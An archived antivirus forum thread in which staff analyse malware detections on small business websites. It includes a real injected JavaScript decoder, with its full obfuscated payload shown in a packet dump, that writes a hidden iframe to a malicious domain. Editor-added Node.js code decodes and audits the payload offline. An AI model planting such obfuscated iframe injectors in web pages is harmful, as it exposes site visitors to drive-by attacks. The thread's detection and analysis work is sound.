Author Topic: VBS:Malware-gen  (Read 198255 times)


kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #75 on: February 21, 2008, 06:16:49 PM »
Somewhere along the downloading of the page, this gets downloaded:

<script language="JavaScript">
e = '0x00' + '19';
str1 = "%A2%FA%F1 ...snippage... %B7%FA%F1%EC%A4";
str = tmp = '';
for (i = 0; i < str1.length; i += 3) {
    tmp = unescape(str1.slice(i, i + 3));
    str = str + String.fromCharCode((tmp.charCodeAt(0) ^ e) - 127);
}
document.write(str);
</script>

It contains 'encrypted' hidden iframe leading to tipcont.com
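Editor's added example (not code from kubecj's post): the same decoder re-implemented so it runs offline and returns the payload instead of handing it to document.write(). The obfuscated string is the complete str1 value as it appears in the packet capture posted later in this thread; everything else (the helper names, the hidden-iframe heuristic) is the editor's. The detail worth noticing is the key: e is built as '0x00' + '19', which is the string '0x0019', and the ^ operator converts it with ToInt32, so the whole scheme is a one-byte XOR with 25 followed by subtracting 127.

```javascript
// Editor's added example, not code from the forum post. It re-implements the
// injected decoder offline so the payload can be read instead of executed.
// OBFUSCATED is the complete str1 value from the packet capture posted later
// in this thread; the helper names and the heuristic below are assumptions.
const OBFUSCATED =
  "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4" +
  "%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7" +
  "%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4" +
  "%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";

// The injected script sets e = '0x00' + '19', i.e. the STRING '0x0019'.
// The ^ operator applies ToInt32 to it, so the effective key is just 25.
const KEY = Number('0x00' + '19');

// Same transform as the payload: take each %XX token, XOR its byte with the
// key and subtract 127. parseInt replaces the deprecated unescape() call.
function decodePayload(str1, key) {
  let out = '';
  for (let i = 0; i < str1.length; i += 3) {
    const byte = parseInt(str1.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ key) - 127);
  }
  return out;
}

// List iframe targets in the decoded HTML without rendering any of it.
function extractIframeSources(html) {
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const sources = [];
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

// Heuristic for the "invisible iframe" pattern: a hidden container or a
// zero/one-pixel frame.
function looksHidden(html) {
  return /visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)\s*=\s*["']?[01]\b/i.test(html);
}

const decoded = decodePayload(OBFUSCATED, KEY);
console.log('key:', KEY);
console.log('decoded:', decoded);
console.log('iframe targets:', extractIframeSources(decoded), 'hidden:', looksHidden(decoded));
```

Run with node; the decoded HTML is a visibility:hidden div wrapping a 1x1 iframe, and the iframe's src is what you report to the host and block, not the obfuscated string. Note that the decoded domain in the capture is tipocnt.com, the spelling Dig uses below.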

simple-it-solutions

  • Guest
Re: VBS:Malware-gen
« Reply #76 on: February 21, 2008, 06:40:07 PM »
Thanks for that we will look into it straight away.

Regards

Graham.

simple-it-solutions

  • Guest
Re: VBS:Malware-gen
« Reply #77 on: February 21, 2008, 06:48:53 PM »
I don't have FTP access to this server, but this line of code looks wrong to me. Is anyone else here familiar with this being inserted into websites?

<script type='text/javascript' src='/e107_files/sleight_js.php'></script>

The .php part looks like it is to prevent downloading or viewing while it runs as a script?

Regards

Graham.

Dig

  • Guest
Re: VBS:Malware-gen
« Reply #78 on: February 21, 2008, 09:48:39 PM »
Hi,

http://www.littlemonkey.co.nz is my site.  I've double and triple checked the scripts running on the site, I've used FireBug to determine network activity when loading the page and can find no encrypted javascript or references to tipocnt.com.

I have scanned it with NOD32 (Virus Bulletin's top-rated antivirus software: http://www.eset.com/products/compare-NOD32-vs-competition.php) and the page is clean.

I have dealt with and cleaned up other sites in the past that have had similar exploits, so I do know what I'm looking for, and was convinced it was a false positive for avast (something that is not unheard of by any means) until kubecj and jsejtko indicated otherwise.  I would really appreciate some further information, i.e. WHERE in the source is that javascript being downloaded and HOW did you determine that it was tipocnt.com?

This is important not just for casual visitors to my site, but for a specific prospect that uses Avast and needs to view my site.

Thanks

Nick


simple-it-solutions

  • Guest
Re: VBS:Malware-gen
« Reply #79 on: February 21, 2008, 10:23:16 PM »
I have seen Dr.Web mentioned a few times, so I have just run a check using it on http://www.littlemonkey.co.nz and it comes up clean. Can we please get someone else to check and confirm that avast may be at fault here?

Regards

Graham

kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #80 on: February 21, 2008, 10:29:05 PM »
http://www.littlemonkey.co.nz

In fact, this is a neat trick. The javascript is sent along with the 302 (redirect) reply. Not sure what browsers 'should' do when they get both a 302 and the content, but obviously, your server sends the 'ugly' stuff.

This is VirusTotal report regarding the code:
http://www.virustotal.com/cs/analisis/7312aedf9204d7300566560d4f681ee0

Code:
Hypertext Transfer Protocol
    HTTP/1.1 302 Found\r\n
        Response Code: 302
    Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n
    Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n
    X-Powered-By: PHP/5.2.0-8+etch9\r\n
    Location: news.php\r\n
    Connection: close\r\n
    Transfer-Encoding: chunked\r\n
    Content-Type: text/html\r\n
    \r\n
    Data (545 bytes)

0000  00 11 2f 0e db b3 00 0b 6b 4d 0a 8c 08 00 45 00   ../.....kM....E.
0010  03 58 22 52 40 00 28 06 e1 c4 d2 37 69 52 0a fe   .X"R@.(....7iR..
0020  05 02 00 50 05 22 f3 26 15 f1 e0 0f 4d cc 50 18   ...P.".&....M.P.
0030  19 20 42 18 00 00 48 54 54 50 2f 31 2e 31 20 33   . B...HTTP/1.1 3
0040  30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20   02 Found..Date:
0050  54 68 75 2c 20 32 31 20 46 65 62 20 32 30 30 38   Thu, 21 Feb 2008
0060  20 32 31 3a 32 33 3a 33 34 20 47 4d 54 0d 0a 53    21:23:34 GMT..S
0070  65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e   erver: Apache/2.
0080  32 2e 33 20 28 44 65 62 69 61 6e 29 20 6d 6f 64   2.3 (Debian) mod
0090  5f 73 73 6c 2f 32 2e 32 2e 33 20 4f 70 65 6e 53   _ssl/2.2.3 OpenS
00a0  53 4c 2f 30 2e 39 2e 38 65 20 6d 6f 64 5f 70 65   SL/0.9.8e mod_pe
00b0  72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35   rl/2.0.2 Perl/v5
00c0  2e 38 2e 38 0d 0a 58 2d 50 6f 77 65 72 65 64 2d   .8.8..X-Powered-
00d0  42 79 3a 20 50 48 50 2f 35 2e 32 2e 30 2d 38 2b   By: PHP/5.2.0-8+
00e0  65 74 63 68 39 0d 0a 4c 6f 63 61 74 69 6f 6e 3a   etch9..Location:
00f0  20 6e 65 77 73 2e 70 68 70 0d 0a 43 6f 6e 6e 65    news.php..Conne
0100  63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72   ction: close..Tr
0110  61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a   ansfer-Encoding:
0120  20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e    chunked..Conten
0130  74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d   t-Type: text/htm
0140  6c 0d 0a 0d 0a 32 31 35 0d 0a 0a 3c 73 63 72 69   l....215...<scri
0150  70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76   pt language="Jav
0160  61 53 63 72 69 70 74 22 3e 65 20 3d 20 27 30 78   aScript">e = '0x
0170  30 30 27 20 2b 20 27 31 39 27 3b 73 74 72 31 20   00' + '19';str1
0180  3d 20 22 25 41 32 25 46 41 25 46 31 25 45 43 25   = "%A2%FA%F1%EC%
0190  38 36 25 45 42 25 45 41 25 45 31 25 46 32 25 46   86%EB%EA%E1%F2%F
01a0  44 25 41 35 25 42 38 25 45 43 25 46 31 25 45 42   D%A5%B8%EC%F1%EB
01b0  25 46 31 25 46 38 25 46 31 25 46 32 25 46 31 25   %F1%F8%F1%F2%F1%
01c0  45 41 25 45 31 25 41 30 25 46 45 25 46 31 25 46   EA%E1%A0%FE%F1%F
01d0  41 25 46 41 25 46 44 25 46 34 25 42 38 25 41 34   A%FA%FD%F4%B8%A4
01e0  25 41 32 25 46 31 25 46 43 25 45 38 25 46 39 25   %A2%F1%FC%E8%F9%
01f0  46 35 25 46 44 25 38 36 25 45 42 25 45 38 25 46   F5%FD%86%EB%E8%F
0200  42 25 41 35 25 42 38 25 46 45 25 45 41 25 45 41   B%A5%B8%FE%EA%EA
0210  25 46 36 25 41 30 25 42 37 25 42 37 25 45 41 25   %F6%A0%B7%B7%EA%
0220  46 31 25 46 36 25 46 37 25 46 42 25 46 34 25 45   F1%F6%F7%FB%F4%E
0230  41 25 42 34 25 46 42 25 46 37 25 46 35 25 42 37   A%B4%FB%F7%F5%B7
0240  25 46 32 25 46 41 25 42 37 25 46 35 25 46 44 25   %F2%FA%B7%F5%FD%
0250  46 34 25 45 41 25 42 37 25 42 38 25 38 36 25 45   F4%EA%B7%B8%86%E
0260  46 25 46 31 25 46 41 25 45 41 25 46 45 25 41 35   F%F1%FA%EA%FE%A5
0270  25 41 39 25 38 36 25 46 45 25 46 44 25 46 31 25   %A9%86%FE%FD%F1%
0280  46 46 25 46 45 25 45 41 25 41 35 25 41 39 25 41   FF%FE%EA%A5%A9%A
0290  34 25 41 32 25 42 37 25 46 31 25 46 43 25 45 38   4%A2%B7%F1%FC%E8
02a0  25 46 39 25 46 35 25 46 44 25 41 34 25 41 32 25   %F9%F5%FD%A4%A2%
02b0  42 37 25 46 41 25 46 31 25 45 43 25 41 34 22 3b   B7%FA%F1%EC%A4";
02c0  73 74 72 3d 74 6d 70 3d 27 27 3b 66 6f 72 28 69   str=tmp='';for(i
02d0  3d 30 3b 69 3c 73 74 72 31 2e 6c 65 6e 67 74 68   =0;i<str1.length
02e0  3b 69 2b 3d 33 29 7b 74 6d 70 20 3d 20 75 6e 65   ;i+=3){tmp = une
02f0  73 63 61 70 65 28 73 74 72 31 2e 73 6c 69 63 65   scape(str1.slice
0300  28 69 2c 69 2b 33 29 29 3b 73 74 72 3d 73 74 72   (i,i+3));str=str
0310  2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72   +String.fromChar
0320  43 6f 64 65 28 28 74 6d 70 2e 63 68 61 72 43 6f   Code((tmp.charCo
0330  64 65 41 74 28 30 29 5e 65 29 2d 31 32 37 29 3b   deAt(0)^e)-127);
0340  7d 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28   }document.write(
0350  73 74 72 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d   str);</script>..
0360  0a 30 0d 0a 0d 0a                                 .0....

« Last Edit: February 21, 2008, 10:32:46 PM by kubecj »
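Editor's added example (not code from kubecj's post): a small parser for the raw response shown above. It strips the chunked transfer-encoding and flags a 3xx redirect whose body still carries script, which is the pattern in this capture. The response text is reconstructed from the headers and hex dump in the post; the chunk size is computed from the script's length and comes out as 0x215 (533 bytes), matching the dump. The function names and the detection heuristic are the editor's assumptions. On the browser question raised in this post: HTTP permits a 302 to carry a body, but when a browser navigates and receives a 3xx with a Location header it follows the redirect and does not render or execute that body, so the script would not run in a visitor's browser. Anything that inspects the stream (an on-access scanner, a proxy, this parser) still sees it, and its presence is proof the server is serving attacker-controlled content.

```javascript
// Editor's added example, not code from the forum post. It parses a raw
// HTTP/1.1 response, removes chunked transfer-encoding, and flags a 3xx
// redirect whose body still carries script. RAW_RESPONSE is reconstructed
// from the capture in this post; the chunk size is derived from the script
// length (0x215 = 533 bytes, as in the dump). Helper names are assumptions.
const OBFUSCATED =
  "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4" +
  "%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7" +
  "%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4" +
  "%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";

// The single chunk's data, byte for byte as in the capture (leading and
// trailing newline included).
const SCRIPT_BODY =
  '\n<script language="JavaScript">e = \'0x00\' + \'19\';str1 = "' + OBFUSCATED + '";' +
  "str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));" +
  'str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>\n';

const RAW_RESPONSE =
  'HTTP/1.1 302 Found\r\n' +
  'Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n' +
  'Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n' +
  'X-Powered-By: PHP/5.2.0-8+etch9\r\n' +
  'Location: news.php\r\n' +
  'Connection: close\r\n' +
  'Transfer-Encoding: chunked\r\n' +
  'Content-Type: text/html\r\n' +
  '\r\n' +
  SCRIPT_BODY.length.toString(16) + '\r\n' + SCRIPT_BODY + '\r\n' + // one 0x215-byte chunk
  '0\r\n\r\n';                                                      // last-chunk, no trailers

// Reassemble a chunked body: hex size line, data, CRLF, until a zero-size chunk.
function decodeChunked(data) {
  let out = '';
  let pos = 0;
  for (;;) {
    const eol = data.indexOf('\r\n', pos);
    if (eol < 0) throw new Error('truncated chunk header');
    const size = parseInt(data.slice(pos, eol).split(';')[0].trim(), 16); // drop chunk extensions
    if (Number.isNaN(size)) throw new Error('bad chunk size');
    if (size === 0) return out;                 // last-chunk; trailers ignored
    const start = eol + 2;
    if (data.length < start + size + 2) throw new Error('truncated chunk data');
    out += data.slice(start, start + size);
    pos = start + size + 2;                     // skip CRLF that follows the data
  }
}

// Split status line, headers (lower-cased names) and body; de-chunk if needed.
function parseHttpResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  if (sep < 0) throw new Error('no header terminator');
  const headLines = raw.slice(0, sep).split('\r\n');
  const status = parseInt(headLines[0].split(' ')[1], 10);
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  let body = raw.slice(sep + 4);
  if ((headers['transfer-encoding'] || '').toLowerCase().includes('chunked')) body = decodeChunked(body);
  return { status, headers, body };
}

// A redirect may legitimately carry a short body, but script in it, and in
// particular a decode-then-document.write() loop, is what an injected payload
// looks like. Returns human-readable findings (empty array = nothing odd).
function auditRedirect(resp) {
  const findings = [];
  if (resp.status >= 300 && resp.status < 400 && /<script\b/i.test(resp.body)) {
    findings.push('HTTP ' + resp.status + ' -> ' + resp.headers['location'] +
                  ' carries <script> in its ' + resp.body.length + '-byte body');
    if (/unescape\s*\(|fromCharCode\s*\(/.test(resp.body) && /document\.write\s*\(/.test(resp.body)) {
      findings.push('body contains a decode-then-document.write() loop (typical iframe injector)');
    }
  }
  return findings;
}

const resp = parseHttpResponse(RAW_RESPONSE);
console.log(resp.status, resp.headers['location'], resp.body.length + ' body bytes');
for (const f of auditRedirect(resp)) console.log('FINDING:', f);
```

The same check applies to 301/303/307 responses and to any page whose redirect body is larger than the one-line "Moved" stub a web server normally emits; a quick triage is to fetch the affected URL with redirects disabled and look at whatever comes back before the Location is followed.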

Dig

  • Guest
Re: VBS:Malware-gen
« Reply #81 on: February 22, 2008, 12:49:43 AM »
Neat trick huh?

Ok, I've removed that malicious code and notified my host to check security at their end.  Could you confirm that the site is now clean please?

I assume that all other virus scans were showing clean as the code is never executed (at least not by firefox) due to the redirect header?  How much of a risk is this type of exploit if browsers ignore the content?

Cheers,
Nick

kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #82 on: February 22, 2008, 12:59:18 AM »
Depends on the point of view.

From the user's view - if the browser won't execute it (I don't know and I can't google anything reasonable), nothing happens; the code is just stored in the user's cache.

From the webmaster's view - something is very wrong regarding the security and this may be just one of the 'bad things' sitting quietly on the server.


Right now avast! does not report anything on load. NOD32 and Dr.Web did not report anything just because they won't catch it at all. See the VirusTotal report - both consider the piece as 'ok'.

MrChuck

  • Guest
Re: VBS:Malware-gen
« Reply #83 on: April 08, 2008, 02:21:23 AM »
I am seeing VBS Malware-gen warnings against the site www.australianolives.com.au. Is it possible to work out whether this is a false positive or an actual malware? The webmaster believes her site is OK; we are using Avast Enterprise with the latest updates (but I've seen the same warning at home with the free edition), and I see from the discussion above that some of these are false positives and some are not. Our local machines are not infected according to avast.

This issue seems pretty tricky!

MrChuck

kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #84 on: April 08, 2008, 09:38:23 AM »
It does reference an encrypted hidden iframe pointing to stat-google.com. We definitely don't like that  8)

DavidR

  • Avast Überevangelist
Re: VBS:Malware-gen
« Reply #85 on: April 08, 2008, 02:35:47 PM »
stat-google.com is registered to Google Inc.; perhaps something similar to google-analytics.com?

blackcat2

  • Guest
Re: VBS:Malware-gen
« Reply #86 on: April 08, 2008, 04:20:29 PM »
I just started noticing incessant warnings for this after the update on several scripts I have on my computer for my websites.
I know there is no malware on them at all so what in the code could possibly be triggering all these warnings?

One of the scripts is something I put together to allow editing of a website template online by the person who downloaded it. It is quite simple really. Nothing malware about it.

It uses javascript and a form combined with a variable (section) to be replaced when the user presses submit. Could it be something in the javascript that is triggering this?

Heidi

kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #87 on: April 08, 2008, 04:25:14 PM »
Maybe. The best you can do is to send us the samples to virus@avast.com, stating that it's a false alarm and also by which VPS version you got which detection.

MrChuck

  • Guest
Re: VBS:Malware-gen
« Reply #88 on: April 09, 2008, 02:15:12 AM »
OK, I'm not much the wiser. Is encrypting a hidden iframe something google is likely to do? If so, why are they using hacker technology for 'legitimate' statistics collection?

So the question still is: should avast be reporting this as a threat or not, and what do I tell the australian olives webmaster?

MrChuck

kubecj

  • Guest
Re: VBS:Malware-gen
« Reply #89 on: April 09, 2008, 09:17:08 AM »
Does she know there is such stuff on her site?
Is stat-google.com really 'legitimate' google site used for tracking purposes? (I don't question the ownership, but that may be bought later)
Why is this stuff hidden in a special file, why does it use document.write, and why is it obfuscated?

To me it definitely looks fishy.